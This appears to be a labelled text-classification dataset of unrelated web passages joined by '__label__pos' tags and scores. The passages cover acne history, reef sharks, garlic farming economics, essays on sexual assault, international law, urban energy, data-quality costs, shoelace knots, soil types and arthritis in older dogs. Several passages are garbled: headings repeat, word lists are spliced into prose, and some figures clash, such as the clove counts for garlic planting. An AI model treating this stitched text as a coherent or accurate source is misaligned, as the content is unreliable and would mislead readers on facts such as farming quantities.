The recognition and characterization of acne progressed in 1776 when Josef Plenck (an Austrian physician) published a book that proposed the novel concept of classifying skin diseases by their elementary (initial) lesions.[164] In 1808 the English dermatologist Robert Willan refined Plenck's work by providing the first detailed descriptions of several skin disorders using a morphologic terminology that remains in use today.[164] Thomas Bateman continued and expanded on Robert Willan's work as his student and provided the first descriptions and illustrations of acne accepted as accurate by modern dermatologists.[164] Erasmus Wilson, in 1842, was the first to make the distinction between acne vulgaris and rosacea.[165] The first professional medical monograph dedicated entirely to acne was written by Lucius Duncan Bulkley and published in New York in 1885.[166][167] Diet. Studies indicate that certain dietary factors, including skim milk and carbohydrate-rich foods — such as bread, bagels and chips — may worsen acne. Chocolate has long been suspected of making acne worse. A small study of 14 men with acne showed that eating chocolate was related to a worsening of symptoms. Further study is needed to examine why this happens and whether people with acne would benefit from following specific dietary restrictions.
|
__label__pos
| 0.506244
|
The proliferation of mobile health (mHealth), namely, mobile applications along with wearable and digital health devices, enables generating the growing amount of heterogeneous data. To increase the value of devices and apps through facilitating new data uses, mHealth companies often provide a web application programming interface (API) to their cloud data repositories, which enables third-party developers to access end users’ data upon receiving their consent. Managing such data sharing requires making design and governance decisions, which must allow maintaining the tradeoff between promoting generativity to facilitate complementors’ contributions and retaining control to prevent the undesirable platform use. However, despite the increasing pervasiveness of web data sharing platforms, their design and governance have not been sufficiently analyzed. By relying on boundary resource theory and analyzing the documentation of 21 web data sharing platforms, the paper identifies and elaborates 18 design and governance decisions that mHealth companies must make to manage data sharing, and discusses their role in maintaining the tradeoff between platform generativity and control.
Details
|
__label__pos
| 0.996032
|
The Caribbean reef shark (Carcharhinus perezi) is a species of requiem shark, belonging to the family Carcharhinidae. It is found in the tropical waters of the western Atlantic Ocean from Florida to Brazil, and is the most commonly encountered reef shark in the Caribbean Sea. With a robust, streamlined body typical of the requiem sharks, this species is difficult to tell apart from other large members of its family such as the dusky shark (C. obscurus) and the silky shark (C. falciformis). Distinguishing characteristics include dusky-colored fins without prominent markings, a short free rear tip on the second dorsal fin, and tooth shape and number. Blowhole Cliffed coast Coastal biogeomorphology Coastal erosion Concordant coastline Current Cuspate foreland Discordant coastline Emergent coastline Feeder bluff Fetch Flat coast Graded shoreline Headlands and bays Ingression coast Large-scale coastal behaviour Longshore drift Marine regression Marine transgression Raised shoreline Rip current Rocky shore Sea cave Sea foam Shoal Steep coast Submergent coastline Surf break Surf zone Surge channel Swash Undertow Volcanic arc Wave-cut platform Wave shoaling Wind wave Wrack zone Cyanobacteria do not have skeletons and individuals are microscopic. Cyanobacteria can encourage the precipitation or accumulation of calcium carbonate to produce distinct sediment bodies in composition that have relief on the seafloor. Cyanobacterial mounds were most abundant before the evolution of shelly macroscopic organisms, but they still exist today (stromatolites are microbial mounds with a laminated internal structure). Bryozoans and crinoids, common contributors to marine sediments during the Mississippian (for example), produced a very different kind of mound. Bryozoans are small and the skeletons of crinoids disintegrate. However, bryozoan and crinoid meadows can persist over time and produce compositionally distinct bodies of sediment with depositional relief. During mating, the male grey reef shark will bite at the female's body or fins to hold onto her for copulation.[13] Like other requiem sharks, it is viviparous: once the developing embryos exhaust their supply of yolk, the yolk sac develops into a placental connection that sustains them to term. Each female has a single functional ovary (on the right side) and two functional uteruses. One to four pups (six in Hawaii) are born every other year; the number of young increases with female size. Estimates of the gestation period range from 9 to 14 months. Parturition is thought to take place from July to August in the Southern Hemisphere and from March to July in the Northern Hemisphere. However, females with "full-term embryos" have also been reported in the fall off Enewetak. The newborns measure 45–60 cm (18–24 in) long. Sexual maturation occurs at around seven years of age, when the males are 1.3–1.5 m (4.3–4.9 ft) long and females are 1.2–1.4 m (3.9–4.6 ft) long. Females on the Great Barrier Reef mature at 11 years of age, later than at other locations, and at a slightly larger size. The lifespan is at least 25 years.[4][20][24]
|
__label__pos
| 0.918983
|
Introduction to Garlic Cultivation Project Report: Introduction to Garlic Cultivation Project Report:
Today, let us get into details of
Garlic Cultivation Project Report.
Garlic is a bulbous plant species belonging to the onion genus. This plant can be very closely associated with onion, leek, shallot, chive, and Chinese onion. The garlic plant is native to central Asia and North Eastern Iran. Garlic is generally used as a seasoning agent in most food preparations and is expected to be known to the ancient Egyptians as a source of traditional medicine. This garlic or botanically Allium Sativum is believed to grow in the wild in some regions and the species that grow in Britain are classified into wild, crow and field garlic. Different species of garlic are named differently in various places such as Allium Vineale (wild or crow garlic), Allium Canadense (meadow or wild garlic) and Allium ampeloprasum (elephant garlic). The single clove variety called as a solo or pearl garlic is found mostly in Yunnan province of China.
The total world production of garlic is more than 26.6 million tonnes, where China alone contributes 80% of the total. India is the second largest producer of garlic and accounts for almost 5% of the total world production. Garlic in India is cultivated mostly in Tamil Nadu, Andhra Pradesh, Uttar Pradesh, and Gujarat. The general composition of raw garlic is 59% water, 33% carbohydrates, 6% protein, 2% dietary fiber and almost 1% fat.
This Garlic cultivation project report describes the agro-climatic requirements for cultivating garlic and also focuses on the investment and profit associated with cultivating garlic on a small area of land. Garlic plant description Garlic plant description The roots of the plant are shallow, which are formed below the bulb. The stem grows to a height of approximately 5 to 6.5 cm. The leaves of the garlic plant are flat, long and grass-like. These leaves smell like garlic when crushed. The colour of the leaves is blue-green and they grow in the form of a dense clump. The leaves on the plant are alternate and are wider at the base of the stem. The shape of the leaves is triangular with 2.5 cm of length and approximately 5 to 7.5 cm of width. The rosettes during the first year extend up to 10 cm high. The flowers appear at the end of the stalk that arises directly from the bulb. The colour of the flowers is white and they are grouped such that they form a globular head. Each flower of garlic has four petals of 0.5 cm in length. These flowers bloom in the spring season. The length of the fruit is 2.5 to 6.3 cm and it looks like a green capsule called silique. This fruit contains many seeds and generally bursts open when mature, thereby dispersing seeds several meters from the plant. Inside the silique, small-black seeds grow in rows. The seeds of garlic are viable for 5 years. It is estimated that plants can produce almost about 800 seeds depending on the environmental conditions, cultivar, and density of planting in the region. These seeds are useful for breeding new plants. Varieties of Garlic Varieties of Garlic
All the different varieties of garlic are divided into two major categories called the soft neck garlic and hard neck garlic. The common garlic found in the supermarkets is called soft neck garlic whereas the garlic, which has more flavor is considered the hard neck garlic. The different varieties of garlic are and are mainly differentiated on the basis of colour, taste, length of storage, size, number of cloves, hardness, and suitability. The varieties are:
Artichoke This variety is vigorous, productive and adaptable. It is easy to grow and can be stored for a longer time. Silverskin Need a mild winter climate to grow. The cloves are tall and pinkish in colour. Have a long storage life of about 8 to 10 months. Good for braiding. Porcelain Impressive to look at because of large clove size and rich flavour. The garlic bulb is smooth and symmetrical with snow-white wrappers. Contains 4 to 8 off white coloured cloves with rose-red or purple coloured stripes. Purple stripe Most suitable variety for cooking. The name indicates the color of the bulb. Generally, a single clove contains 8 to 12 bulbs. Cloves are tall and elongated. Rocambole Each bulb contains 6 to 11 cloves. This variety can be stored for 3 to 4 months. Cloves are either brownish or reddish in colour.
Other than these some developed cultivars of India are Bhima Omkar, Bhima purple, Agrifound white, Yamuna safed, Yamuna safed (2, 3, 5), Godavari, Shewta, Phule Baswant, GG-4, VL garlic 1, VL lahsun 2 and agrifound parvati (2).
Soil and climatic requirements for growing Garlic Soil and climatic requirements for growing Garlic
Garlic can best be cultivated in warm climatic conditions. The most suitable growth temperature for the cultivation of garlic is 13 to 24˚C. The length of the day and the temperature of the region influence the plants. Bulb formation needs approximately 13 to 14 hours of day length for long day garlic variety and about 10 to 12 hours for short day garlic varieties. Garlic can be cultivated at elevations of 1000 to 1300 meters above sea level.
Garlic needs well-drained soil with rich organic content; therefore compost or rotten manure is incorporated into the soil to make it friable and suitable for production. The pH level of the soil should be in between 6 and 8 for garlic farming. The soil should be made loose before planting so that it helps in the growth of the bulb. Generally, loamy soils have natural draining properties is considered good for garlic cultivation.
Propagation of Garlic Crop Propagation of Garlic Crop
Cloves are used for the propagation of garlic. Generally, 315 to 500 cloves are needed for one hectare of land.
Land preparation and planting of Garlic Land preparation and planting of Garlic
The land for garlic cultivation should be done well in advance to eliminate perennial weeds, adjust the pH and improve the organic content if needed. Generally ploughing is done to a depth of 15 to 20 cm. The land should be harrowed and maintained in good tilth. All obstructions on the surface of the soil should be cleared and if irrigation is needed in the region, then the land should be levelled for arranging irrigation facilities.
Each method of planting has different spacing between rows. The general spacing recommendations for planting cloves is 8 to 15 cm with a row spacing of about 30 to 40 cm. Furrows of a minimum depth of 50 mm and spacing of 200 to 300 mm are created. The seeds are sown manually or mechanically along the rows. The root end of the clove should be sown into the soil in an erect manner. Garlic plants are normally cultivated on double plant row raised beds.
Generally, garlic is planted both during the Rabi (October-November) and Kharif season (June-July). Rabi crops of garlic are grown on flatbeds of about 4-6 m long and 1.5-2 m wide. Kharif crops are grown with a furrow system as mentioned above.
Manure and fertilizer requirement of Garlic Farming Manure and fertilizer requirement of Garlic Farming
Garlic plants need lots of fertilizer. The most important thing while garlic cultivation is to incorporate compost into the soil to improve the fertility of the soil and maintain its structure. While planting the cloves; about 125 g of 3:2:3 of NPK fertilizer is applied per m² of the area using the broadcasting method. Side dressing is done lightly with 40 g of 3:2:3 NPK per m² during the growing period. This is approximately 6 to 8 weeks of planting. If the field has not been treated with compost, then a supplement of nitrogen as a fertilizer is added to the soil. Fertilizers can be applied through irrigation as well, but care must be taken to avoid foliar burn. Supplying fertilizers through Fertigation mechanism is useful because the roots directly receive the fertilizers and there is reduced nitrogen leaching through ground water.
Irrigation needs for growing Garlic Irrigation needs for growing Garlic
Moisture in the soil is more important than the quantity of water. Too much water in the plant area can cause water stress and results in the splitting of the bulbs. Too little supply of water can seize the growth of the bulb. So, the recommended irrigation frequency is: once immediately after planting and another at an interval of one week to 10 days after first irrigation. The moisture content in the soil should always be checked before irrigating the plants. The farmers provide the last irrigation cycle just 2 or 3 days before harvesting. The commonly used methods for irrigation are furrow, sprinkler, and drip irrigation. The most suitable time for irrigating the plants is morning to mid-afternoon so that there is sufficient time for the plant foliage to dry before the night. In regions with extremely hot and dry weather conditions, mulching is done on the fields to conserve the moisture in the soil.
Intercultural practices of Garlic Intercultural practices of Garlic Since garlic is a shallow-rooted crop, there is the possibility of not utilizing the entire nutrients that have been supplied. So after some time these fertilizers and nutrients leach down and settle in the subsoil level, therefore deep-rooted leguminous crops are planted after garlic cultivation to get improved yields and also to help maintain the fertility levels of the soil. Groundnuts can also be alternatively cropped after garlic cultivation. One month after sowing, first, weeding is done by hand or khurpi. Almost about a month later, the second weeding is done. The land is hoed just before the bulb formation so as to loosen the soil and facilitate in better bulb formation. Once the bulbs start developing, weeding or hoeing should not be done because this may damage the stem and impair the quality of the cloves. Mulching is done on the farmland to suppress the weeds and conserve the soil moisture, but grain straw as a mulch material is avoided because it is a host to several pests. Mulching is expected to increase the yield of garlic significantly. Some varieties of garlic plants produce flower stalks; removing these stalks enhances the crop maturity and yield. The increase in yield is about 70% after the removal of the stalks. Pest and disease control of Garlic Pest and disease control of Garlic
The most common pests found in garlic plants are cutworms, pink stalk borer, thrips, and eriophyidmite. Pests can be controlled by practicing natural ways, such as weed control, removal of destroyed plant parts etc. growing maize or wheat on the outer rows is considered to be a barrier for thrips. Chemicals (sulphur, carbosulphan, profenofos, and fipronil) as per recommended doses can also be used for controlling an extreme infestation.
The garlic plants are generally infected with diseases like onion yellow dwarf disease, leek yellow stripe, Irish yellow spot, purple blotch, stemphylium blight, white rot, brown rust, pink root, neck rot etc. The control measures include the removal of diseased parts and following crop rotation. Using disease resistant cultivars as planting material can also reduce the occurrence of diseases. Doing soil solarisation before garlic cultivation can also help control some soil-borne diseases. If the infection is more severe than one can use the recommended dose of fungicides to control the spread of diseases.
Read: Common Plant Diseases. Harvest and yield of Garlic Harvest and yield of Garlic
The crop of garlic is a 4 to 5-month duration crop. The indication of maturity is known by the change in the colour of the leaves to yellowish or brownish. Sometimes the leaves also dry up one month after the stalk emergence. Once the plants have dried, they are uprooted completely using a country plough and tied in small bunches. These bundles are kept in the fields or in the shade for almost 2 or 3 days for drying and curing; this, therefore, helps the bulb to harden and prolong their keeping quality.
The average yield of garlic from a land of one hectare is approximately estimated to be 50 to 70 quintals.
Post-harvest management of Garlic Post-harvest management of Garlic
Once the harvest is obtained, there are several other things done to handle the produce such that it is kept safe for the market. These handling mechanisms are:
Curing is done indoors with the use of forced air to dry them. They can also be placed in slotted bins, wired racks or open trays in a well-ventilated area. The tops and roots of the garlic are trimmed after curing them. This is either done mechanically or by hand. The outer sheath which is loose is removed by brushing the bulbs and this is the last step before marketing. The garlic bulbs are graded according to their size, shape, and flavor. The packing is done in a mesh bag or well-ventilated crates. Too many bulbs should not be packed in a crate because they generate heat, which may ultimately reduce the quality of the bulbs. To maximize storage life of the bulbs, they should be properly cured and stored at 0˚C with a relative humidity of about 60 to 70%. Under these conditions, the bulbs can be stored for 6 to 7 months. If the humidity is high, then it facilitates the development of penicillin mould and root growth. As the temperatures increase beyond 0˚C, the rate of bulb weight loss also increases. Another way of storing the bulbs is by using controlled atmosphere with 0.5% of O₂ and about 5 to 10% of CO₂. Cost and profit analysis of Garlic Cultivation / Economics of Garlic Farming / Garlic Cultivation Project Report Cost and profit analysis of Garlic Cultivation / Economics of Garlic Farming / Garlic Cultivation Project Report
The investment model for cultivating garlic in
one hectare of land is described here. Fixed charges like a land rental, electricity, transport, etc. are not described here. These values may change depending on the region of the farm. The most important recurring costs are detailed below for reference. In the non-rain-fed regions or very dry and hot regions, the farms are facilitated with drip or sprinkler systems, which would incur an additional cost of around Rs 50,000 to Rs 75,000 per hectare depending on the size of the farm.
Material and labour Investment in Rs 135 kgs of seeds as planting material @125/kg 16,875.00 2.72 tonnes of FYM 2,500.00 52.5 kg of N, 46 kg of P and 26.40 kg of K (fertilizers) 5,000.00 Plant protection chemicals 1,000.00 95.54 man-days of human labour 19,108.00 7.50 bullock pair days 2,625.00 3 hours of machine labor 1,650.00 Total cost 48,758.00
The yield from the farm is 50 to 70 quintals (5,000 to 7,000 kg) per hectare.
Cost of garlic: Rs 50 per kg (average price) when sold at farmgate or in bulk from farmers.
So on lower side:
Income from the farm is: total yield x cost per unit = 5,000 x 50 = Rs 2,50,000 Profit from the farm is total income – total investment = Rs 2, 01,242 (Around 2 lakh rupees for 1 hectare or 2.5 acres land with good yield). Loans and subsidies for Garlic Cultivation Loans and subsidies for Garlic Cultivation
It is advisable to visit the National Horticulture Board for assistance and description of components for availing the subsidies for farming projects. NABARD also works to help farmers get loans and subsidies on various farming components depending on the size of the project.
Read: Polyhouse Rose Farming.
|
__label__pos
| 0.859861
|
Sexual Assault Sexual coercion, sexual assault, and rape are acts of violence with numerous physical and mental health consequences (Helgeson, 430). It is important for future generations to be informed about these topics so that we can it prevent it from continuing. Sexual assaults are a rising problem for female teens on college campuses because of the discrepancies with the no means no policy, reoccurring problems with college fraternities, and today’s “rape” culture enabling sexual assault. It
by sexual assault and are left, physically and mentally scarred. Sexual abuse can come in many different forms, such as; sexual harassment, stranger assault and a more under reported crime, such as date rape (Types of Sexual Assault). Date rape drugs are used in sexual assault; which is any type of sexual activity that a person does not agree upon (Date Rape Drug: Get the Facts on the Different Kinds). Anyone can be a victim of sexual assault regardless of their race, culture, gender, sexual orientation
Anyone can be a victim of sexual assault. It does not matter what gender, age, economic class, religion, or race you are, because it can happen to anyone. According to one website, “Rape victims are doctors, lawyers, nurses, military personnel, cooks, accountants, students- anyone and everyone could be vulnerable to rape or sexual assault,” (“Rape Myths and Facts,” 2015). Therefore, yes males can be the victims of sexual assault, in fact one out of every 10 rape victims are male, (RAINN, 2016). Overall
Sexual abuse is a very sensitive and serious issue in United States, yet as well as other counties. Although we all live in a modern civilize world, we hear more and more about this unpleasant affairs happening all the time, and it seem like these problems are only increasing in every country. Therefore, each nation have their own legal definition and law of sexual assault. The following information is an example of a legal definition and statistic of those countries. United States – In the U.S
Rape and Sexual Assault Rape is a type of sexual assault usually involving sexual intercourse, which is initiated by one or more persons against another person without that person’s consent. The act maybe carried out by force, under threat, or with a person who is incapable with valid consent. The definition of rape varies both in different parts of the world and at different times in history. According to the American Medical Association, sexual violence, and rape in particular, is considered
Out”). Since this announcement many people across the country have begun to voice their opinions on the issue. Parents who shop at Target are claiming that this new bathroom policy is unsafe for their children and that it’s putting them at risk for assault. My question is: Did sexual assault, rape, and molestation just now become a worrisome factor in these parent’s eyes’? I hope not. If a sexual predator wanted to target your child are the chances for that any higher after the policy change when every
Rape and sexual assault have been a growing epidemic not only in The United States, but all around the world as well. There are many stories based on these issues that also deal with something called date rape drugs. Rape, sexual assault, and date rape drugs are all very closely related and can all occur in the same situation. Date rape drugs can be used to lead to a sexual assault against someone and then possibly rape. These topics are all very serious because “There is an average of 207,754
comprehend the simple meaning of the word no. Records of sexual assault are going through the roof, because of the fact people do not understand that no means no. The main victims of sexual assault are women and statics show one in four women have experienced unwanted sexual content. People come up with numerous excuses of why to blame the woman for the experiences they face, which is wrong and make women question themselves. Women who are sexual assaulted are judged by themselves and by our society
and Shields found that sexual assault rates are “3.1 to 4.4 times higher at the most permissive colleges and universities than their more restrictive counterparts”. The strict enforcing of alcohol bans can reduce sexual assault incidents. Socially regulated environments such as those found in religious schools do in fact keep the incidents of rape and sexual assault down. However Richardson and Shields points out that this is not because these schools effectively condemned rape, but rather the restricted
Rapes and sexual assaults have become issues more and more in our society. Society has become more aware of these types of crimes. For a long time, there was only rape, now it is less broad than just that. Individuals, government bodies and school have all decided to work together and individually on lessening the crime. Studies have revealed many shocking statistics that have pushed society to act against these crimes. Below, I will be explaining what exactly is rape and sexual assault, how they
|
__label__pos
| 0.624416
|
We use cookies to distinguish you from other users and to provide you with a better experience on our websites. Close this message to accept cookies or find out how to manage your cookie settings.
INTRODUCTION
The International Law Commission (ILC or the Commission) has a mandate from the United Nations (UN) General Assembly (the UNGA or the General Assembly) to codify and progressively develop international law. During most of the ILC's history, the lion's share of its work product took the form of draft articles adopted by the UNGA as the basis for multilateral conventions. The ILC's activities received their principal legal effect during this period through the UN treaty-making process, rather than directly on the basis of the ILC's analysis of what customary international law (CIL or custom) does or should require.
In recent decades, however, the ILC has self-consciously limited its efforts to codify or progressively develop international law in the form of multilateral conventions. Instead, it has turned to other outputs – such as principles, conclusions, and draft articles, that it does not recommend be turned into treaties. Significantly, the Commission often claims that these outputs reflect CIL. For example, despite recommending that the General Assembly not base a treaty on the Draft Articles on State Responsibility, the ILC as well as many states and commentators assert that the draft articles largely reflect CIL.
This change in behavior presents a puzzle. If the ILC is still engaged in codification and progressive development, why has it changed the form of the work it produces? In this chapter, we argue that increasing political gridlock in the General Assembly – by which we mean a division of views over the substance of international norms and lack of enthusiasm for convening multilateral diplomatic conferences – has led the Commission to modify the form of its work to preserve its influence in shaping the evolution of international law. More specifically, we argue that the reduced likelihood of the General Assembly adopting draft articles as treaties closes off the primary mechanism of ILC influence. In addition, if the UNGA or member states reject an ILC recommendation that its draft articles become treaties, that rejection may suggest that the work product does not reflect existing custom – an alternative mechanism of ILC influence. To avoid these negative outcomes, we expect the ILC to turn to other outputs that allow it to continue to influence CIL without the General Assembly's approval.
Executive Summary
More than 50% of the global population already lives in urban settlements and urban areas are projected to absorb almost all the global population growth to 2050, amounting to some additional three billion people. Over the next decades the increase in rural population in many developing countries will be overshadowed by population flows to cities. Rural populations globally are expected to peak at a level of 3.5 billion people by around 2020 and decline thereafter, albeit with heterogeneous regional trends. This adds urgency in addressing rural energy access, but our common future will be predominantly urban. Most of urban growth will continue to occur in small-to medium-sized urban centers. Growth in these smaller cities poses serious policy challenges, especially in the developing world. In small cities, data and information to guide policy are largely absent, local resources to tackle development challenges are limited, and governance and institutional capacities are weak, requiring serious efforts in capacity building, novel applications of remote sensing, information, and decision support techniques, and new institutional partnerships. While ‘megacities’ with more than 10 million inhabitants have distinctive challenges, their contribution to global urban growth will remain comparatively small.
Energy-wise, the world is already predominantly urban. This assessment estimates that between 60–80% of final energy use globally is urban, with a central estimate of 75%. Applying national energy (or GHG inventory) reporting formats to the urban scale and to urban administrative boundaries is often referred to as a ‘production’ accounting approach and underlies the above GEA estimate.
Email your librarian or administrator to recommend adding this to your organisation's collection.
|
__label__pos
| 0.78517
|
How much does poor data quality cost your organization?
In the 6 weeks of my course, Data Quality Improvement at BCIT, I try to impart to them an understanding of how to ‘discover’ the instances of poor data quality in the data sets they are responsible for so that they can begin to help their team to ‘monetize’ the effects of that poor data quality. Each organization is different and so there are no ‘out of the box’ solutions that will fit everyone, so I try to show my students how they can use some specific tools and techniques to support the cost benefit analyses behind enabling continuous improvement in data quality.
Joseph Juran, a pioneer of quality who defined quality as fitness for use and something that satisfies customer needs, said that:
“In the USA, about a third of what we do consists of redoing work previously ‘done’.”
Juran’s stark ‘one third’ statistic came from his understanding of the inefficiencies built into the average organization’s business processes, and to a large extent many of those inefficiencies can be reduced by use of process improvement methods such as Theory Of Constraints, Lean and Six Sigma. Those same techniques, initially developed for manufacturers for improving business processes, should also be considered for the improving the ‘manufacture of data’ in today’s organizations. If you think about it, most organizations are not so much focused on the manufacture of widgets – rather they are focused on the management of the decisions based the data produced by their business processes.
Juran’s ‘one third’ statistic is congruent with the chapter on the costs of poor data quality in Larry English’s “Information Quality Applied”, where English details the statistical analyses illustrating that the costs of poor data quality are between 20% and 35% of the operating revenue of the average organization.
If the data produced by an organization’s business processes does not support their decision making, then their decisions will be sub-optimal. However, if the data can be cajoled into supporting the critical decisions but always has to first be cleaned up, massaged and filtered before it is ‘safe for decision making’, then the organization is forced into an inefficient ‘data gathering and cleansing’ cycle that could actually be building into a dangerous time lag between when the time the decisions should be made, and when the data required to make those decisions is finally clean enough to support the key decisions.
Here’s how you can estimate the cost of poor data quality in 5 simple steps.
IBM puts the cost of poor data quality in the USA at $3.1 Trillion dollars per year, which is roughly 15% of the USA GDP of $20 Trillion. To paraphrase Everett Dirksen “
A trillion here, a trillion there, and pretty soon you’re talking about real money.”
So, it looks like the ‘ball park’ guesstimate for how much poor data quality is costing your company is
between 15% and 35% of operating revenue, if your company is in the average range. Does that seem like a reasonable amount of money to waste? Is it reasonable to waste any money due to poor data quality? Jack Olson, in his book “Data Quality: The Accuracy Dimension”, says that roughly half of the costs due to poor data quality can be recovered or mitigated. The other half is irrecoverable due to the continuous evolution of data sets, interfaces and technologies at a local and industrial level. Olson’s book is the only one Ralph Kimball has reviewed on Amazon, and after giving it a 5 out of 5, Kimball says “ This book is on my very short list of essential reading for data warehouse professionals.”
So, without sounding facetious, can I ask a simple question? If you have not been keeping metrics on the quality of data in your organization, should you consider publishing a note to advise the stakeholders and/or shareholders of your organization that, due to lack of measurement, you do not know how much our poor data quality is costing them. Sounds extreme doesn’t it. But we have all been hearing ideas around valuing organizations data and reporting it on regular basis. It just might happen. Look at the perturbances from Europe’s General Data Protection Regulation (GDPR).
According to the March 2017 MIT Sloan article, many companies do not know the answer to the question “
What is Your Data Worth?”, but it seems reasonable to assume that if the data is of poor quality, that the data is literally worth less than if it were of pristine quality. And we should really do everything we can to keep those two words ‘worth’ and ‘less’ from combining when an auditor assesses the value of our data!
|
__label__pos
| 0.51124
|
Many people wonder why their shoelaces are all the time untied, in spite of tying a tight knot. But, the researchers claim that there is science behind it. They claim that the combination of foot stomping and leg swinging cause the laces to slip apart. This is a very obvious reason, but the scientists give reasons to study knots. Knots are everywhere, right from surgeries, to cable constructions. But apparently, the kind of knot tied can also define the strength of the knot.
Types Of Knots
The mechanical engineers were baffled to know that there are two ways to tie the bow-tie knot in shoelaces.
The weaker version is the granny knot – Take a rope, cross both ends left over right, bring the left end under and out, and repeat. The stronger version is the square knot – Instead of repeating the first step, finish the knot by crossing the right end over the left.
To analyse the reason, the researchers attached sensors to shoelace knots as study co-author Christine Gregg, a runner, walked and ran. To better understand, they also repeatedly swung a pendulum arm with the shoelace, so that the forces that a knot experiences, could be analysed.
Coming Undone
Slow-motion videos of Gregg running on a treadmill showed that the Granny knot was held together for many strides but once it loosened a little, it failed within another two strides. Intriguingly, the weak knot did not untie while Gregg’s leg was just swung back and forth, or when he stomped his foot on the ground, which meant that the knot failure is dependent upon swing and stomp.
The sensors revealed that while running, the feet strike the ground with seven times the force of gravity, which apparently causes the knots to untie. Researchers claim that the whipping motions of the free ends of the laces, which is caused by swinging legs, apparently makes the laces slip. They also concluded that hanging weights on the laces also makes it slip faster.
Why Study Knots?
Knots are not only present in shoelaces but also in your DNA. Researchers are now building microscopic structures made of DNA and other molecules. The researchers claim that these can involve complex knots in the structure that are subject to different and various forces. These are definitely going to be complicated knotted structures which are important to be understood.
The scientists claim that in order to understand these structures, it is important to study knots and know the reasons behind what makes them untied and how. Building these complex and crucial structures makes, studying knots mandatory. Daily Diamond claimed that further research might throw some light upon why square knots are stronger than granny knots. Also, computer simulations of how the knots work, would disentangle the complex role friction likely plays.
|
__label__pos
| 0.878659
|
The success of any garden comes down to the quality and health of your soil. Like your plants, soil is in fact a living thing that gets hungry, tired, and sick and needs to be nurtured in order to function properly. But what exactly is soil? Basically, it's a mixture of water, rocks, and organic matter such as decaying leaves and insects. Some native, in-ground soil that you may find naturally occurring includes sandy (made up of large rock bits), clayish (made up of small rock bits), or silty (made up of intermediate size between sand and clay). The soil that's considered the Holy Grail, however, is a mix of different sized soil particles with loam, a nutrient-dense humus, added in. Loamy soil opens up heavy clay soil and allows oxygen, nutrients, and water to flow and bulks up light sandy soils while also adding fertility.
Not sure what kind of soil you have? A simple "feel test" will give you a general idea. To do this, take a tablespoon of soil, lightly wet it, then roll it into a ball. If the ball molds together you have clay. If you can mold it but then it crumbles, then you may have a combo of sand and clay. If you try to make a ball and no matter how much water you add it won't form a ball, then you have sandy soil. The beauty is that once you know what you have, then you can amend it. A key factor in successful gardening is also knowing that different plants thrive with different types of soil. Also, different means of growing plants—say in raised beds or pots—also dictates the type of soil you'll need.
Premixed and ready-to-use soils can take some of the guesswork out of what to purchase. Here's a look at some of the most popular varieties.
Potting Soil
This light, airy soil mix is specifically formulated for container gardening to provide adequate drainage and space for roots to grow. Just add it to pots and plant directly into it. You'll want to replace potting soil annually.
Soilless Mix
Soilless blends are perfect for starting delicate seeds. These super light mixes are usually made of peat moss, perlite, and vermiculite and like the name implies, does not contain organic matter that could harm or kill tender seedlings.
Raised Bed Mixes
Raised bed soil is used when filling a raised bed that exists on top of native soil. If your native soil is extra challenging, planting above ground can be the quickest and easiest path to success.
Cactus, Palm, and Citrus Mixes
Topsoil
Low-grade topsoil is good for filling and leveling holes but not formulated for planting. Higher-grade topsoil can be used to supplement less than ideal native soil.
Lawn Mix
This mix is primarily used for over-seeding and lawn repair. Most bagged lawn soil contains additives to increase water retention plus a starter fertilizer.
Compost/Manure
Organic matter is superb for adding to any soil type because it enriches and boosts fertility while releasing nutrients over an extended period of time, giving it a much longer-lasting impact than fast-acting chemical fertilizers. You can use compost as a mulch, then let the earthworms do the hard work of dragging it underground.
|
__label__pos
| 0.953006
|
The global financial crisis continues to affect prospects for growth and poverty reduction in developing countries. As in previous economic crises, the impact varies between countries. This reflects differences in economic structures, historical legacies and policies, and in the resulting levels of vulnerability to economic shocks. There is, however, growing recognition of the importance of the governance and institutional set up of a country in responding effectively to financial crises and other similar shocks. What is perhaps less clear is how, in reality, these affect policy responses and their implementation. There is a lack of evidence on the incentives for more sustainable and effective reform processes, beyond the immediate crisis, and on the blockages that might prevent such reform.
These issues are key to understanding the dynamics underlying developing countries’ policy responses to economic shocks, and to informing both domestic and international priorities in this area. A political economy approach to the analysis of the role of state capacity and incentives to respond to economic shocks would help to fill these knowledge gaps. While more research is needed, this Project Briefing reviews the range of policy responses to the global financial crisis, as a first step. It sets out some useful frameworks and concepts to deepen our understanding of these issues, and to inform more effective assistance for countries affected by similar external shocks in the future.
|
__label__pos
| 0.985047
|
#digital health
For all the transformative and life-saving benefits that 5G has to offer, a number of obstacles stand in the way of the NHS capitalising on the technology
Increases in life expectancy will put unprecedented pressure on our healthcare systems. Exploring the science of ageing and our understanding of co-morbidities will be crucial in tackling this ‘longevity trap’
A digital NHS promises widespread benefits for clinicians and patients, but only if personal data can be protected at a time of increasing cyberattacks
‘A clear vision for the system that filters down to local level is vital’
Regulation targeting fake medicines could speed up the adoption of technology in pharmacies
Better advice to people with diabetes could avoid serious medical complications, premature deaths and unsustainable costs to the NHS
A wide range of monitors to test blood glucose levels and unequal access results in sometimes uncertain self-management
There have been more advances in the field of medical devices and technology to help people with their type 1 diabetes treatments in the last five years than in the previous fifty
|
__label__pos
| 0.549993
|
Gray muzzles. Cloudy eyes. Difficulty getting up from the floor or finding the tennis ball you just threw. Maybe even a few accidents from a thoroughly housetrained dog. These are all signs that your dog is aging — and that he or she needs you more than ever.
Aging, just like in humans, can bring a number of health concerns. “Like humans, aging dogs face arthritis and joint problems often made worse by being overweight or obese. Their vision and hearing also worsen overtime,” says holistic veterinarian Dr. Babette Gladstein. No matter what the issues are, your senior dogs are depending on you in their golden years.
One of the most common issues in older dogs is arthritis.
If you notice that your dog is limping, walking with stiff joints, reluctant to do things that were previously easy, or licking, chewing, or biting at his legs, your dog may have arthritis. The first order of action is to schedule a vet visit.
Once you have a diagnosis, there will be several options available for treatment. Traditionally, non-steroidal anti-inflammatories, or NSAIDS, are prescribed for pain, but these can have serious side effects.
For those not wanting to risk any adverse reactions, there are other options. Alternative veterinary therapies are a fascinating mix of ancient treatments, such as acupuncture and Chinese herbal therapies with futuristic technological advances, such as laser therapy, ultrasound, prolotherapy, and electromagnetic field therapy. A combination of different types of treatments may be recommended.
Here is a breakdown of the most common alternative therapies and what you need to know about them.
1. Physical Therapy
“Physical therapy is often the first recommended form of treatment, which includes stretching the muscles and doing exercises that strengthen and improve their range of motion,” says Dr. Babette. “Many dogs can benefit greatly from regular physical therapy.”
